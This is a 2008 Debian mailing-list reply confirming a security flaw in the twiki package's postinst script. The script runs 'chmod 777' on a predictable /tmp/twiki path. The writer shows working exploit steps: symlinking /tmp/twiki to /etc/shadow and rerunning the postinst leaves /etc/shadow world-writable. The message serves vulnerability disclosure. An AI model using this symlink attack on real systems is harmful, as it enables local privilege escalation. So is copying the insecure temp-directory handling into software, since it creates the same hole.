On Wed Aug 13, 2008 at 11:31:54 +1000, Sven Dowideit wrote: > I will have to assume that this report is indeed incorrect unless I hear > otherwise.
On my Debian Etch system: [EMAIL PROTECTED]:~$ apt-get source twiki Reading package lists... Done Building dependency tree... Done Need to get 4304kB of source archives. Get: 1 http://mirror.bytemark.co.uk etch/main twiki 1:4.0.5-9.1 (dsc) [639B] Get: 2 http://mirror.bytemark.co.uk etch/main twiki 1:4.0.5-9.1 (tar) [4264kB] Get: 3 http://mirror.bytemark.co.uk etch/main twiki 1:4.0.5-9.1 (diff) [39.3kB] Fetched 4304kB in 7s (546kB/s) gpg: Signature made Wed 21 Feb 2007 06:51:24 GMT using DSA key ID C0143D2D gpg: Can't check signature: public key not found dpkg-source: extracting twiki in twiki-4.0.5 dpkg-source: unpacking twiki_4.0.5.orig.tar.gz dpkg-source: applying ./twiki_4.0.5-9.1.diff.gz [EMAIL PROTECTED]:~$ cd twiki-4.0.5/ [EMAIL PROTECTED]:~/twiki-4.0.5$ grep /tmp/twiki debian/postinst if [ ! -e /tmp/twiki ]; then mkdir /tmp/twiki chmod 777 /tmp/twiki chown $TWIKI_OWNER.www-data /tmp/twiki [EMAIL PROTECTED]:~/twiki-4.0.5$ So : 1. If /tmp/twiki doesn't exist it is made as a directory. 2. If it does exist its permissions are changed - unconditionally Let me exploit it: [EMAIL PROTECTED]:~$ [EMAIL PROTECTED]:~$ ln -s /etc/shadow /tmp/twiki [EMAIL PROTECTED]:~$ sudo apt-get install twiki Password: Reading package lists... Done Building dependency tree... Done The following extra packages will be installed: libalgorithm-diff-perl liblocale-maketext-lexicon-perl libtext-diff-perl rcs Suggested packages: ... ... Setting up libtext-diff-perl (0.35-2) ... Setting up rcs (5.7-18) ... Setting up twiki (4.0.5-9.1) ... Adding password for user TWikiGuest Reloading web server config...3224 Now what happened? Nothing. The directory /tmp/twiki was created and my symlink wasn't touched. So we look safe. But I'm not convinced. I know that I can coerce it into working: [EMAIL PROTECTED]:~$ sudo rm -rf /tmp/twiki [EMAIL PROTECTED]:~$ ln -s /etc/shadow /tmp/twiki [EMAIL PROTECTED]:~$ sudo /var/lib/dpkg/info/twiki.postinst configure Reloading web server config...3224 . [EMAIL PROTECTED]:~$ ls -l /etc/shadow -rwxrwxrwx 1 www-data www-data 1093 2008-08-13 10:35 /etc/shadow I guess the difference is relating to the presence, or not, of /var/lib/twiki/data ? Looks like merely installing the package wouldn't trigger this, but an upgrade might. Or something like that ! Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
